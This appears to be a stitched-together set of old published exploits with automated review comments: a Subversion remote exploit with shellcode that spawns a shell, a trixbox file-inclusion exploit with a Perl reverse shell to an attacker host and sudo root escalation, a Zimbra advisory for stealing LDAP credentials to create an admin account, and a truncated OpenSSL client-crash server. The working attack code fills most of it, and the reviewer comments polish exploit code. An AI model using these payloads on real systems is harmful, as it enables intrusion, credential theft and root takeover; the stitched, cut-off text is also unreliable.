"\x53" // push %ebx "\x53" // push %ebx
"\x58" // pop %eax "\x58" // pop %eax
"\x50" // push %eax "\x50" // push %eax
"\x5f" // pop %edi # %eax = %ebx = %edi = 0 "\x5f" // pop %edi # %eax = %ebx = %edi = 0
"\x2c\x40" // sub $0x40, %al "\x2c\x40" // sub $0x40, %al
"\x50" // push %eax "\x50" // push %eax
"\x5b" // pop %ebx "\x5b" // pop %ebx
"\x50" // push %eax "\x50" // push %eax
"\x5a" // pop %edx # %ebx = %edx = 0xC0 "\x5a" // pop %edx # %ebx = %edx = 0xC0
"\x57" // push %edi "\x57" // push %edi
"\x57" // push %edi # safety-0 "\x57" // push %edi # safety-0
"\x54" // push %esp "\x54" // push %esp
"\x59" // pop %ecx # %ecx = pointer to the buffer "\x59" // pop %ecx # %ecx = pointer to the buffer
"\x4b" // dec %ebx # beginloop: "\x4b" // dec %ebx # beginloop:
"\x57" // push %edi "\x57" // push %edi
"\x58" // pop %eax # clear %eax "\x58" // pop %eax # clear %eax
"\xd6" // salc (UTF-8) "\xd6" // salc (UTF-8)
"\xb0\x60" // movb $0x60, %al "\xb0\x60" // movb $0x60, %al
"\x2c\x44" // sub $0x44, %al # %eax = 0x1C "\x2c\x44" // sub $0x44, %al # %eax = 0x1C
"\xcd\x80" // int $0x80 # fstat(i, &stat) "\xcd\x80" // int $0x80 # fstat(i, &stat)
"\x58" // pop %eax "\x58" // pop %eax
"\x58" // pop %eax "\x58" // pop %eax
"\x50" // push %eax "\x50" // push %eax
"\x50" // push %eax "\x50" // push %eax
"\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set? "\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set?
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x72\xed" // jb beginloop "\x72\xed" // jb beginloop
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) # %ebx now contains the socket fd "\x90" // nop (UTF-8) # %ebx now contains the socket fd
// begin read(2) // begin read(2)
"\x57" // push %edi "\x57" // push %edi
"\x58" // pop %eax # zero %eax "\x58" // pop %eax # zero %eax
"\x40" // inc %eax "\x40" // inc %eax
"\x40" // inc %eax "\x40" // inc %eax
"\x40" // inc %eax # %eax=3 "\x40" // inc %eax # %eax=3
//"\x54" // push %esp //"\x54" // push %esp
//"\x59" // pop %ecx # %ecx ... address of buffer //"\x59" // pop %ecx # %ecx ... address of buffer
//"\x54" // push %edi //"\x54" // push %edi
//"\x5a" // pop %edx # %edx ... bufferlen (0xC0) //"\x5a" // pop %edx # %edx ... bufferlen (0xC0)
"\xcd\x80" // int $0x80 # read(2) second stage loader "\xcd\x80" // int $0x80 # read(2) second stage loader
"\x39\xc7" // cmp %eax, %edi "\x39\xc7" // cmp %eax, %edi
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x7f\xf3" // jg startover "\x7f\xf3" // jg startover
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x54" // push %esp "\x54" // push %esp
"\xc3" // ret # execute second stage loader "\xc3" // ret # execute second stage loader
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\0" // %ebx still contains the fd we can use in the 2nd stage loader. "\0" // %ebx still contains the fd we can use in the 2nd stage loader.
; ;
char stage2loader[]= char stage2loader[]=
// dup2 - %ebx contains the fd // dup2 - %ebx contains the fd
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x00\x00\x00\x00" // mov $0x0, %ecx "\xb9\x00\x00\x00\x00" // mov $0x0, %ecx
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x01\x00\x00\x00" // mov $0x1, %ecx "\xb9\x01\x00\x00\x00" // mov $0x1, %ecx
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x02\x00\x00\x00" // mov $0x2, %ecx "\xb9\x02\x00\x00\x00" // mov $0x2, %ecx
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
// start /bin/sh // start /bin/sh
"\x31\xd2" // xor %edx, %edx "\x31\xd2" // xor %edx, %edx
"\x52" // push %edx "\x52" // push %edx
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e "\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f "\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x89\xe3" // mov %esp, %ebx "\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx "\x52" // push %edx
"\x53" // push %ebx "\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx "\x89\xe1" // mov %esp, %ecx
"\xb8\x0b\x00\x00\x00" // mov $0xb, %eax "\xb8\x0b\x00\x00\x00" // mov $0xb, %eax
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
"\xb8\x01\x00\x00\x00" // mov $0x1, %eax "\xb8\x01\x00\x00\x00" // mov $0x1, %eax
"\xcd\x80" // int %0x80 (exit) "\xcd\x80" // int %0x80 (exit)
; ;
int stage2loaderlen=69; int stage2loaderlen=69;
char requestfmt[]= char requestfmt[]=
"REPORT %s HTTP/1.1\n" "REPORT %s HTTP/1.1\n"
"Host: %s\n" "Host: %s\n"
"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n" "User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
"Content-Length: %d\n" "Content-Length: %d\n"
"Content-Type: text/xml\n" "Content-Type: text/xml\n"
"Connection: close\n\n" "Connection: close\n\n"
"%s\n"; "%s\n";
char xmlreqfmt[]= char xmlreqfmt[]=
"<?xml version=\"1.0\" encoding=\"utf-8\"?>" "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">" "<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
"<D:creationdate>%s%c%c%c%c</D:creationdate>" "<D:creationdate>%s%c%c%c%c</D:creationdate>"
"</S:dated-rev-report>"; "</S:dated-rev-report>";
int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000]) int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
{ {
char *ptr; char *ptr;
char bfr[1000]; char bfr[1000];
ptr=strstr(uri,"://"); ptr=strstr(uri,"://");
if(!ptr) return -1; if(!ptr) return -1;
*ptr=0; *ptr=0;
snprintf(bfr,sizeof(bfr),"%s",uri); snprintf(bfr,sizeof(bfr),"%s",uri);
if(!strcmp(bfr,"http")) if(!strcmp(bfr,"http"))
*proto=HTTP, *port=80; *proto=HTTP, *port=80;
else if(!strcmp(bfr,"svn")) else if(!strcmp(bfr,"svn"))
*proto=SVN, *port=3690; *proto=SVN, *port=3690;
else else
{ {
printf("Unsupported protocol %s\n",bfr); printf("Unsupported protocol %s\n",bfr);
return -1; return -1;
} }
uri=ptr+3; uri=ptr+3;
if((ptr=strchr(uri,':'))) if((ptr=strchr(uri,':')))
{ {
*ptr=0; *ptr=0;
snprintf(host,1000,"%s",uri); snprintf(host,1000,"%s",uri);
uri=ptr+1; uri=ptr+1;
if((ptr=strchr(uri,'/'))==NULL) return -1; if((ptr=strchr(uri,'/'))==NULL) return -1;
*ptr=0; *ptr=0;
snprintf(bfr,1000,"%s",uri); snprintf(bfr,1000,"%s",uri);
*port=(int)strtol(bfr,NULL,10); *port=(int)strtol(bfr,NULL,10);
*ptr='/'; *ptr='/';
uri=ptr; uri=ptr;
} }
else if((ptr=strchr(uri,'/'))) else if((ptr=strchr(uri,'/')))
{ {
*ptr=0; *ptr=0;
snprintf(host,1000,"%s",uri); snprintf(host,1000,"%s",uri);
*ptr='/'; *ptr='/';
uri=ptr; uri=ptr;
} }
snprintf(repos,1000,"%s",uri); snprintf(repos,1000,"%s",uri);
return 0; return 0;
} }
int exec_sh(int sockfd) int exec_sh(int sockfd)
{ {
char snd[4096],rcv[4096]; char snd[4096],rcv[4096];
fd_set rset; fd_set rset;
while(1) while(1)
{ {
FD_ZERO(&rset); FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset); FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset); FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL); select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset)) if(FD_ISSET(fileno(stdin),&rset))
{ {
memset(snd,0,sizeof(snd)); memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin); fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd)); write(sockfd,snd,strlen(snd));
} }
if(FD_ISSET(sockfd,&rset)) if(FD_ISSET(sockfd,&rset))
{ {
memset(rcv,0,sizeof(rcv)); memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0) if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0); exit(0);
fputs(rcv,stdout); fputs(rcv,stdout);
} }
} }
} }
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
int sock, port; int sock, port;
size_t size; size_t size;
char cmd[1000], reply[1000], buffer[1000]; char cmd[1000], reply[1000], buffer[1000];
char svdcmdline[1000]; char svdcmdline[1000];
char host[1000], repos[1000], *ptr, *caddr; char host[1000], repos[1000], *ptr, *caddr;
unsigned long addr; unsigned long addr;
struct sockaddr_in sin; struct sockaddr_in sin;
struct hostent *he; struct hostent *he;
enum protocol proto; enum protocol proto;
/*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666); /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
write(sock,stage1loader,strlen(stage1loader)); write(sock,stage1loader,strlen(stage1loader));
close(sock); close(sock);
return 0;*/ return 0;*/
printf("hoagie_subversion - remote exploit against subversion servers\n" printf("hoagie_subversion - remote exploit against subversion servers\n"
"by greuff@void.at\n\n"); "by greuff@void.at\n\n");
if(argc!=3) if(argc!=3)
{ {
printf("Usage: %s serverurl offset\n\n",argv[0]); printf("Usage: %s serverurl offset\n\n",argv[0]);
printf("Examples:\n" printf("Examples:\n"
" %s svn://localhost/repository 0x41414141\n" " %s svn://localhost/repository 0x41414141\n"
" %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]); " %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
printf("The offset is an alphanumeric address (or UTF-8 to be\n" printf("The offset is an alphanumeric address (or UTF-8 to be\n"
"more precise) of a pop instruction, followed by a ret.\n" "more precise) of a pop instruction, followed by a ret.\n"
"Brute force when in doubt.\n\n"); "Brute force when in doubt.\n\n");
printf("When exploiting against an svn://-url, you can supply a\n" printf("When exploiting against an svn://-url, you can supply a\n"
"binary offset too.\n\n"); "binary offset too.\n\n");
exit(1); exit(1);
} }
// parse the URI // parse the URI
snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]); snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
if(parse_uri(argv[1],&proto,host,&port,repos)<0) if(parse_uri(argv[1],&proto,host,&port,repos)<0)
{ {
printf("URI parse error\n"); printf("URI parse error\n");
exit(1); exit(1);
} }
printf("parse_uri result:\n" printf("parse_uri result:\n"
"Protocol: %d\n" "Protocol: %d\n"
"Host: %s\n" "Host: %s\n"
"Port: %d\n" "Port: %d\n"
"Repository: %s\n\n",proto,host,port,repos); "Repository: %s\n\n",proto,host,port,repos);
addr=strtoul(argv[2],NULL,16); addr=strtoul(argv[2],NULL,16);
caddr=(char *)&addr; caddr=(char *)&addr;
printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]); printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);
sock=socket(AF_INET,SOCK_STREAM,0); sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0) if(sock<0)
{ {
perror("socket"); perror("socket");
return -1; return -1;
} }
he=gethostbyname(host); he=gethostbyname(host);
if(he==NULL) if(he==NULL)
{ {
herror("gethostbyname"); herror("gethostbyname");
return -1; return -1;
} }
sin.sin_family=AF_INET; sin.sin_family=AF_INET;
sin.sin_port=htons(port); sin.sin_port=htons(port);
memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr)); memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{ {
perror("connect"); perror("connect");
return -1; return -1;
} }
if(proto==SVN) if(proto==SVN)
{ {
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline); snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
strcpy(cmd,"( ANONYMOUS ( 0: ) ) "); strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader, snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]); caddr[0],caddr[1],caddr[2],caddr[3]);
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
} }
else if(proto==HTTP) else if(proto==HTTP)
{ {
// preparing the request... // preparing the request...
snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader, snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]); caddr[0],caddr[1],caddr[2],caddr[3]);
size=strlen(buffer); size=strlen(buffer);
snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer); snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);
// now sending the request, immediately followed by the 2nd stage loader // now sending the request, immediately followed by the 2nd stage loader
printf("Sending:\n%s",cmd); printf("Sending:\n%s",cmd);
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
sleep(1); sleep(1);
write(sock,stage2loader,stage2loaderlen); write(sock,stage2loader,stage2loaderlen);
} }
// SHELL LOOP // SHELL LOOP
printf("Entering shell loop...\n"); printf("Entering shell loop...\n");
exec_sh(sock); exec_sh(sock);
/*sleep(1); /*sleep(1);
close(sock); close(sock);
printf("\nConnecting to the shell...\n"); printf("\nConnecting to the shell...\n");
exec_sh(connect_sh()); */ exec_sh(connect_sh()); */
return 0; return 0;
} }
// milw0rm.com [2005-05-03] // milw0rm.com [2005-05-03]
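Review bot: `size` is declared `size_t` but assigned from `read(2)` and used directly in `reply[size]=0;` in the `proto==SVN` branch, so a failed read (-1) becomes a huge index and a read that fills the buffer writes `reply[1000]`, one past the end; make it `ssize_t`, bail out on `<= 0`, and read at most `sizeof(reply)-1` bytes. `memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));` copies the size of a pointer rather than of the address; use `he->h_length`. Smaller points: `exit`, `strtol` and `strtoul` are called without `<stdlib.h>`, the `select` in `exec_sh` passes the magic number 255 as nfds where `sockfd+1` is meant, and `int stage2loaderlen=69;` duplicates what `sizeof(stage2loader)-1` already says and will silently go stale if the payload array is edited.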


@ -1,134 +1,134 @@
#!/usr/bin/perl -w #!/usr/bin/perl -w
# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit # Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit
# 2008-07-09 # 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo. # This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
# #
# perl trixbox_fi_v2.pl 192.168.1.212 # perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed # Please listen carefully as our menu option has changed
# Choose from the following options: # Choose from the following options:
# 1> Remote TCP shell # 1> Remote TCP shell
# 2> Read local file # 2> Read local file
# 1 # 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444 # Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk] # Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root # root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444) # Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue... # Press enter to continue...
# done... # done...
# nc -l -v -p 4444 # nc -l -v -p 4444
# listening on [any] 4444 ... # listening on [any] 4444 ...
# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397 # connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397
# bash: no job control in this shell # bash: no job control in this shell
# bash-3.1# id # bash-3.1# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# bash-3.1# # bash-3.1#
use strict; use strict;
use Switch; use Switch;
use LWP::UserAgent; use LWP::UserAgent;
use HTTP::Cookies; use HTTP::Cookies;
usage() unless @ARGV; usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php"; my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new; my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new; my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar); $ua->cookie_jar($cookie_jar);
menu(); menu();
sub execScript{ sub execScript{
my $scriptCode = shift; my $scriptCode = shift;
post($scriptCode); post($scriptCode);
my $phpsessionid = extractPHPSID($cookie_jar->as_string); my $phpsessionid = extractPHPSID($cookie_jar->as_string);
post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00"); post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
} }
sub post{ sub post{
my $postData = shift; my $postData = shift;
my $req = HTTP::Request->new(POST => $url); my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded'); $req->content_type('application/x-www-form-urlencoded');
$req->content($postData); $req->content($postData);
my $res = $ua->request($req); my $res = $ua->request($req);
my $content = $res->content; my $content = $res->content;
return $content; return $content;
} }
sub readFile{ sub readFile{
my $file = shift; my $file = shift;
my $content = post("langChoice=../../../../../../../../../..$file%00"); my $content = post("langChoice=../../../../../../../../../..$file%00");
my @fileLines = split(/\n/,$content); my @fileLines = split(/\n/,$content);
my $fileContent = "Content of $file: \n\n"; my $fileContent = "Content of $file: \n\n";
for(my $i=3;$i<@fileLines;$i++){ for(my $i=3;$i<@fileLines;$i++){
last if($fileLines[$i] =~ m/trixbox - User Mode/); last if($fileLines[$i] =~ m/trixbox - User Mode/);
$fileContent = $fileContent . $fileLines[$i-3] . "\n"; $fileContent = $fileContent . $fileLines[$i-3] . "\n";
} }
return $fileContent; return $fileContent;
} }
sub tcp_reverse_shell{ sub tcp_reverse_shell{
my $rhost= shift; my $rhost= shift;
my $rport = shift; my $rport = shift;
my $uid = shift; my $uid = shift;
my $rshell; my $rshell;
if($uid eq "asterisk"){ if($uid eq "asterisk"){
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00"; $rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00";
}else{ }else{
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00"; $rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00";
} }
execScript($rshell); execScript($rshell);
} }
sub extractPHPSID{ sub extractPHPSID{
$_ = shift; $_ = shift;
if(/PHPSESSID=(\w+)/){ if(/PHPSESSID=(\w+)/){
return $1; return $1;
} }
} }
sub menu{ sub menu{
print <<EOF; print <<EOF;
Please listen carefully as our menu option has changed Please listen carefully as our menu option has changed
Choose from the following options: Choose from the following options:
1> Remote TCP shell 1> Remote TCP shell
2> Read local file 2> Read local file
EOF EOF
my $option = <STDIN>; my $option = <STDIN>;
chop($option); chop($option);
switch($option){ switch($option){
case 1 { case 1 {
print "Host and port the reverse shell should connect to ? "; print "Host and port the reverse shell should connect to ? ";
print "(<host>:<port>): "; print "(<host>:<port>): ";
my $hp=<STDIN>; my $hp=<STDIN>;
chop($hp); chop($hp);
print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]"; print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]";
my $uid=<STDIN>; my $uid=<STDIN>;
chop($uid); chop($uid);
my($rhost,$rport) = split(/:/,$hp); my($rhost,$rport) = split(/:/,$hp);
print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n"; print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
print "Press enter to continue..."; print "Press enter to continue...";
<STDIN>; <STDIN>;
tcp_reverse_shell($rhost,$rport,$uid); tcp_reverse_shell($rhost,$rport,$uid);
print "done...\n"; print "done...\n";
} }
case 2 { case 2 {
while(1){ while(1){
print "Full path (e.g. /etc/passwd): "; print "Full path (e.g. /etc/passwd): ";
my $file = <STDIN>; my $file = <STDIN>;
chop($file); chop($file);
print readFile($file) . "\n\n"; print readFile($file) . "\n\n";
} }
} }
} }
} }
sub usage{ sub usage{
print "./trixbox_fi.pl <host>\n"; print "./trixbox_fi.pl <host>\n";
exit 1; exit 1;
} }
# milw0rm.com [2008-07-09] # milw0rm.com [2008-07-09]
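Review bot: `extractPHPSID` assigns to the global `$_` with `$_ = shift;` and no `local`, so it clobbers the caller's `$_`; use a lexical (`my $jar = shift;` and `$jar =~ /PHPSESSID=(\w+)/`) instead. Two further style points: `chop($option)`, `chop($hp)`, `chop($uid)` and `chop($file)` should all be `chomp`, since `chop` removes the last character even when no trailing newline is present, and `use Switch` is a source-filter module that was deprecated in 5.12 and removed from the Perl core in 5.14, so a plain `if`/`elsif` on `$option` is the portable form of the `menu` dispatch. For anyone writing detections from this file, the request shape it sends, `langChoice=` followed by a `../` traversal and a trailing `%00`, is the string to look for in web-server logs.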


@ -1289,6 +1289,6 @@ int main(int argc, char* argv[])
close(ssl1->sock); close(ssl1->sock);
return 0; return 0;
} }
/* spabam: It isn't 0day */ /* spabam: It isn't 0day */
// milw0rm.com [2003-04-04] // milw0rm.com [2003-04-04]


@ -0,0 +1,59 @@
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Example :
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
----------------Exploit-----------------
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !
The number of servers vuln are huge like 80/100.
This is only for educational purpouses.
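Review bot: the header's `Version` field lists years (2009 to early 2013) rather than Zimbra release numbers, and `Tested on: Centos(x)` and `CVE : No CVE, no patch just 0Day` read as placeholders; fill in the affected release range and the actual tested versions so defenders can scope exposure, and update the CVE line once an identifier is assigned. The description has several spelling errors (afected, wich, privlegies, acces, purpouses). The LFI request shown, `.../Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00`, is also the pattern to search access logs for when checking for exploitation attempts, since a legitimate `skin` parameter contains neither a `../` traversal nor a trailing `%00`.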


@ -1,55 +1,55 @@
#!/usr/bin/perl #!/usr/bin/perl
# Copyright(c) Beyond Security # Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module # Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response # Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response
use strict; use strict;
use IO::Socket; use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, ); my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock; die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5; my $TIMEOUT = 0.5;
my $line; my $line;
my $new_sock; my $new_sock;
srand(time()); srand(time());
while ( $new_sock = $sock->accept() ) while ( $new_sock = $sock->accept() )
{ {
printf ("new connection\n"); printf ("new connection\n");
my $rin; my $rin;
my $line; my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef); my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);
my $ciphers = ""; my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers)); my $ciphers_length = pack('n', length($ciphers));
my $certificate = ""; my $certificate = "";
my $certificate_length = pack('n', length($certificate)); my $certificate_length = pack('n', length($certificate));
my $packet_sslv2 = my $packet_sslv2 =
"\x04". "\x04".
"\x01". # Hit (default 0x01) "\x01". # Hit (default 0x01)
"\x00". # No certificate "\x00". # No certificate
"\x00\x02". "\x00\x02".
$certificate_length. $certificate_length.
$ciphers_length. $ciphers_length.
"\x00\x10". "\x00\x10".
# Certificate # Certificate
$certificate. $certificate.
# Done # Done
# Ciphers # Ciphers
$ciphers. $ciphers.
# Done # Done
